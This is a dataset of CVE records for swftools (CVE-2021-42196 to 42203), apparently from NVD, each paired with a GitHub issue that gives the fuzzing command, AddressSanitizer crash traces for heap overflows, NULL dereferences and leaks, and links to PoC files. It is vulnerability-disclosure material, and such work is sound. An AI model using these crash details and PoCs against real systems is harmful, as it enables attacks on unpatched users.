[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "903C4729-89F8-4583-AEFA-C1883FE61F59", "versionEndExcluding": null, "versionEndIncluding": "2020-12-22", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/174
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
### system info Ubuntu x86_64, clang 6.0, swfdump (latest master a9d5082) ### Command line ./src/swfdump -D @@ ### AddressSanitizer output ==44192==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60600000e8d3 at pc 0x000000410aca bp 0x7fffffffdee0 sp 0x7fffffffded0 READ of size 1 at 0x60600000e8d3 thread T0 #0 0x410ac9 in handleEditText /test/swftools-asan/src/swfdump.c:549 #1 0x408624 in main /test/swftools-asan/src/swfdump.c:1511 #2 0x7ffff68a683f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #3 0x40c168 in _start (/test/swftools-asan/src/swfdump+0x40c168) 0x60600000e8d3 is located 0 bytes to the right of 51-byte region [0x60600000e8a0,0x60600000e8d3) allocated by thread T0 here: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x532fa7 in rfx_alloc /test/swftools-asan/lib/mem.c:30 #2 0x541396 (/test/swftools-asan/src/swfdump+0x541396) SUMMARY: AddressSanitizer: heap-buffer-overflow /test/swftools-asan/src/swfdump.c:549 handleEditText Shadow bytes around the buggy address: 0x0c0c7fff9cc0: 00 00 00 00 00 00 02 fa fa fa fa fa 00 00 00 00 0x0c0c7fff9cd0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 fa 0x0c0c7fff9ce0: fa fa fa fa 00 00 00 00 00 00 00 05 fa fa fa fa 0x0c0c7fff9cf0: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 0x0c0c7fff9d00: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 fa =>0x0c0c7fff9d10: fa fa fa fa 00 00 00 00 00 00[03]fa fa fa fa fa 0x0c0c7fff9d20: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 0x0c0c7fff9d30: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 fa 0x0c0c7fff9d40: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa 0x0c0c7fff9d50: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 0x0c0c7fff9d60: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==44192==ABORTING POC [handleEditText_poc](https://gitee.com/cxlzff/fuzz-poc/blob/master/swftools/handleEditText_poc)
heap-buffer-overflow exists in the function handleEditText in swfdump.c
https://api.github.com/repos/swftools/swftools/issues/174/comments
0
2021-10-07T13:17:16Z
2021-10-07T13:17:16Z
https://github.com/swftools/swftools/issues/174
1,020,034,970
174
CVE-2021-42196
2022-06-02T14:15:29.777
An issue was discovered in swftools through 20201222. A NULL pointer dereference exists in the function traits_parse() located in abc.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/172" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "903C4729-89F8-4583-AEFA-C1883FE61F59", "versionEndExcluding": null, "versionEndIncluding": "2020-12-22", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/172
[ "Exploit", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
### system info Ubuntu x86_64, clang 6.0, swfdump (latest master a9d5082) ### Command line ./src/swfdump -D @@ ### AddressSanitizer output ==47344==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000030 (pc 0x000000488d17 bp 0x000000000000 sp 0x7fffffffdd20 T0) #0 0x488d16 in traits_parse as3/abc.c:482 #1 0x495d41 in swf_ReadABC as3/abc.c:946 #2 0x409045 in main /test/swftools-asan/src/swfdump.c:1577 #3 0x7ffff68a683f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #4 0x40c168 in _start (/test/swftools-asan/src/swfdump+0x40c168) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV as3/abc.c:482 traits_parse ==47344==ABORTING POC [traits_parse_poc](https://gitee.com/cxlzff/fuzz-poc/blob/master/swftools/traits_parse_poc)
A NULL pointer dereference exists in the function traits_parse in abc.c
https://api.github.com/repos/swftools/swftools/issues/172/comments
0
2021-10-07T13:11:09Z
2021-10-07T13:11:09Z
https://github.com/swftools/swftools/issues/172
1,020,028,404
172
CVE-2021-42197
2022-06-02T14:15:29.817
An issue was discovered in swftools through 20201222 through a memory leak in the swftools when swfdump is used. It allows an attacker to cause code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/177" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "903C4729-89F8-4583-AEFA-C1883FE61F59", "versionEndExcluding": null, "versionEndIncluding": "2020-12-22", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/177
[ "Exploit", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
### system info Ubuntu x86_64, clang 6.0, swfdump (latest master a9d5082) ### Command line ./src/swfdump -D @@ ### AddressSanitizer output ==43305==ERROR: LeakSanitizer: detected memory leaks Indirect leak of 63245 byte(s) in 2 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x532fa7 in rfx_alloc /test/swftools-asan/lib/mem.c:30 #2 0x7fffffffe2bf (<unknown module>) Indirect leak of 144 byte(s) in 3 object(s) allocated from: #0 0x7ffff6f0279a in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9879a) #1 0x53318c in rfx_calloc /test/swftools-asan/lib/mem.c:69 #2 0x7fffffffe2bf (<unknown module>) SUMMARY: AddressSanitizer: 63389 byte(s) leaked in 5 allocation(s). POC [memory_leaks_poc](https://gitee.com/cxlzff/fuzz-poc/blob/master/swftools/memory_leaks_poc)
memory leaks in swftools when we use swfdump
https://api.github.com/repos/swftools/swftools/issues/177/comments
0
2021-10-07T13:25:36Z
2021-10-07T13:25:36Z
https://github.com/swftools/swftools/issues/177
1,020,044,016
177
CVE-2021-42198
2022-06-02T14:15:29.860
An issue was discovered in swftools through 20201222. A NULL pointer dereference exists in the function swf_GetBits() located in rfxswf.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/168" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "903C4729-89F8-4583-AEFA-C1883FE61F59", "versionEndExcluding": null, "versionEndIncluding": "2020-12-22", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/168
[ "Exploit", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
### system info Ubuntu x86_64, clang 6.0, swfdump (latest master a9d5082) ### Command line ./src/swfdump -D @@ ### AddressSanitizer output ==41593==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000471fac bp 0x0ffffed896e0 sp 0x7fffffffdd30 T0) #0 0x471fab in swf_GetBits /test/swftools-asan/lib/rfxswf.c:213 #1 0x478bf8 in swf_GetMatrix /test/swftools-asan/lib/rfxswf.c:867 #2 0x414975 in handlePlaceObject /test/swftools-asan/src/swfdump.c:831 #3 0x409acd in main /test/swftools-asan/src/swfdump.c:1604 #4 0x7ffff68a683f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #5 0x40c168 in _start (/test/swftools-asan/src/swfdump+0x40c168) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /test/swftools-asan/lib/rfxswf.c:213 swf_GetBits ==41593==ABORTING POC [swf_GetBits_null_poc](https://gitee.com/cxlzff/fuzz-poc/blob/master/swftools/swf_GetBits_null_poc)
A NULL pointer dereference exists in the function swf_GetBits in rfxswf.c
https://api.github.com/repos/swftools/swftools/issues/168/comments
0
2021-10-07T12:57:51Z
2021-10-07T12:58:43Z
https://github.com/swftools/swftools/issues/168
1,020,014,352
168
CVE-2021-42199
2022-06-02T14:15:29.900
An issue was discovered in swftools through 20201222. A heap buffer overflow exists in the function swf_FontExtract_DefineTextCallback() located in swftext.c. It allows an attacker to cause code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/173" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "903C4729-89F8-4583-AEFA-C1883FE61F59", "versionEndExcluding": null, "versionEndIncluding": "2020-12-22", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/173
[ "Exploit", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
### system info Ubuntu x86_64, clang 6.0, swfdump (latest master a9d5082) ### Command line ./src/swfdump -D @@ ### AddressSanitizer output ==29246==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61600000ffa0 at pc 0x00000044059d bp 0x7fffffffd270 sp 0x7fffffffd260 WRITE of size 2 at 0x61600000ffa0 thread T0 #0 0x44059c in swf_FontExtract_DefineTextCallback modules/swftext.c:508 #1 0x449c46 in swf_FontExtract_DefineText modules/swftext.c:532 #2 0x44a355 in swf_FontExtract modules/swftext.c:617 #3 0x40c2dc in fontcallback2 /test/swftools-asan/src/swfdump.c:941 #4 0x4433c6 in swf_FontEnumerate modules/swftext.c:133 #5 0x409208 in main /test/swftools-asan/src/swfdump.c:1296 #6 0x7ffff68a683f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #7 0x40c168 in _start (/test/swftools-asan/src/swfdump+0x40c168) AddressSanitizer can not describe address in more detail (wild memory access suspected). SUMMARY: AddressSanitizer: heap-buffer-overflow modules/swftext.c:508 swf_FontExtract_DefineTextCallback Shadow bytes around the buggy address: 0x0c2c7fff9fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9fd0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa 0x0c2c7fff9fe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c2c7fff9ff0: fa fa fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fffa000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fffa010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fffa020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fffa030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fffa040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==29246==ABORTING POC [swf_FontExtract_DefineTextCallback_poc](https://gitee.com/cxlzff/fuzz-poc/blob/master/swftools/swf_FontExtract_DefineTextCallback_poc)
heap-buffer-overflow exists in the function swf_FontExtract_DefineTextCallback in swftext.c
https://api.github.com/repos/swftools/swftools/issues/173/comments
0
2021-10-07T13:13:41Z
2021-10-07T13:13:41Z
https://github.com/swftools/swftools/issues/173
1,020,030,975
173
CVE-2021-42200
2022-06-02T14:15:29.943
An issue was discovered in swftools through 20201222. A NULL pointer dereference exists in the function main() located in swfdump.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/170" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "903C4729-89F8-4583-AEFA-C1883FE61F59", "versionEndExcluding": null, "versionEndIncluding": "2020-12-22", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/170
[ "Exploit", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
### system info Ubuntu x86_64, clang 6.0, swfdump (latest master a9d5082) ### Command line ./src/swfdump -D @@ ### AddressSanitizer output ==1975==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000406f68 bp 0x7fffffffe3a0 sp 0x7fffffffdf30 T0) #0 0x406f67 in main /test/swftools-asan/src/swfdump.c:1323 #1 0x7ffff68a683f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #2 0x40c168 in _start (/test/swftools-asan/src/swfdump+0x40c168) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /test/swftools-asan/src/swfdump.c:1323 main ==1975==ABORTING POC [main_poc](https://gitee.com/cxlzff/fuzz-poc/blob/master/swftools/main_poc)
A NULL pointer dereference exists in the function main in swfdump.c
https://api.github.com/repos/swftools/swftools/issues/170/comments
0
2021-10-07T13:06:05Z
2021-10-07T13:06:05Z
https://github.com/swftools/swftools/issues/170
1,020,023,108
170
CVE-2021-42201
2022-06-02T14:15:29.987
An issue was discovered in swftools through 20201222. A heap-buffer-overflow exists in the function swf_GetD64() located in rfxswf.c. It allows an attacker to cause code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/175" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "903C4729-89F8-4583-AEFA-C1883FE61F59", "versionEndExcluding": null, "versionEndIncluding": "2020-12-22", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/175
[ "Exploit", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
### system info Ubuntu x86_64, clang 6.0, swfdump (latest master a9d5082) ### Command line ./src/swfdump -D @@ ### AddressSanitizer output ==8687==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60b00000aff8 at pc 0x000000473b4e bp 0x7fffffffdc10 sp 0x7fffffffdc00 READ of size 8 at 0x60b00000aff8 thread T0 #0 0x473b4d in swf_GetD64 /test/swftools-asan/lib/rfxswf.c:520 #1 0x4a7851 in pool_read as3/pool.c:1119 #2 0x4935ec in swf_ReadABC as3/abc.c:748 #3 0x409045 in main /test/swftools-asan/src/swfdump.c:1577 #4 0x7ffff68a683f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #5 0x40c168 in _start (/test/swftools-asan/src/swfdump+0x40c168) 0x60b00000affd is located 0 bytes to the right of 109-byte region [0x60b00000af90,0x60b00000affd) allocated by thread T0 here: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x532fa7 in rfx_alloc /test/swftools-asan/lib/mem.c:30 #2 0x541396 (/test/swftools-asan/src/swfdump+0x541396) SUMMARY: AddressSanitizer: heap-buffer-overflow /test/swftools-asan/lib/rfxswf.c:520 swf_GetD64 Shadow bytes around the buggy address: 0x0c167fff95a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c167fff95b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c167fff95c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c167fff95d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c167fff95e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c167fff95f0: fa fa 00 00 00 00 00 00 00 00 00 00 00 00 00[05] 0x0c167fff9600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c167fff9610: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c167fff9620: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c167fff9630: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c167fff9640: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==8687==ABORTING POC [swf_GetD64_poc](https://gitee.com/cxlzff/fuzz-poc/blob/master/swftools/swf_GetD64_poc)
heap-buffer-overflow exists in the function swf_GetD64 in rfxswf.c
https://api.github.com/repos/swftools/swftools/issues/175/comments
0
2021-10-07T13:20:00Z
2021-10-07T13:20:00Z
https://github.com/swftools/swftools/issues/175
1,020,037,867
175
CVE-2021-42202
2022-06-02T14:15:30.030
An issue was discovered in swftools through 20201222. A NULL pointer dereference exists in the function swf_DeleteFilter() located in swffilter.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/171" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "903C4729-89F8-4583-AEFA-C1883FE61F59", "versionEndExcluding": null, "versionEndIncluding": "2020-12-22", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/171
[ "Exploit", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
### system info Ubuntu x86_64, clang 6.0, swfdump (latest master a9d5082) ### Command line ./src/swfdump -D @@ ### AddressSanitizer output ==5769==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000042ba78 bp 0x000000000073 sp 0x7fffffffdea0 T0) #0 0x42ba77 in swf_DeleteFilter modules/swffilter.c:290 #1 0x40de0b in dumpButton2Actions /test/swftools-asan/src/swfdump.c:245 #2 0x409448 in main /test/swftools-asan/src/swfdump.c:1600 #3 0x7ffff68a683f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #4 0x40c168 in _start (/test/swftools-asan/src/swfdump+0x40c168) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV modules/swffilter.c:290 swf_DeleteFilter ==5769==ABORTING POC [swf_DeleteFilter_poc](https://gitee.com/cxlzff/fuzz-poc/blob/master/swftools/swf_DeleteFilter_poc)
A NULL pointer dereference exists in the function swf_DeleteFilter in swffilter.c
https://api.github.com/repos/swftools/swftools/issues/171/comments
0
2021-10-07T13:09:20Z
2021-10-07T13:09:20Z
https://github.com/swftools/swftools/issues/171
1,020,026,516
171
CVE-2021-42203
2022-06-02T14:15:30.083
An issue was discovered in swftools through 20201222. A heap-use-after-free exists in the function swf_FontExtract_DefineTextCallback() located in swftext.c. It allows an attacker to cause code execution.
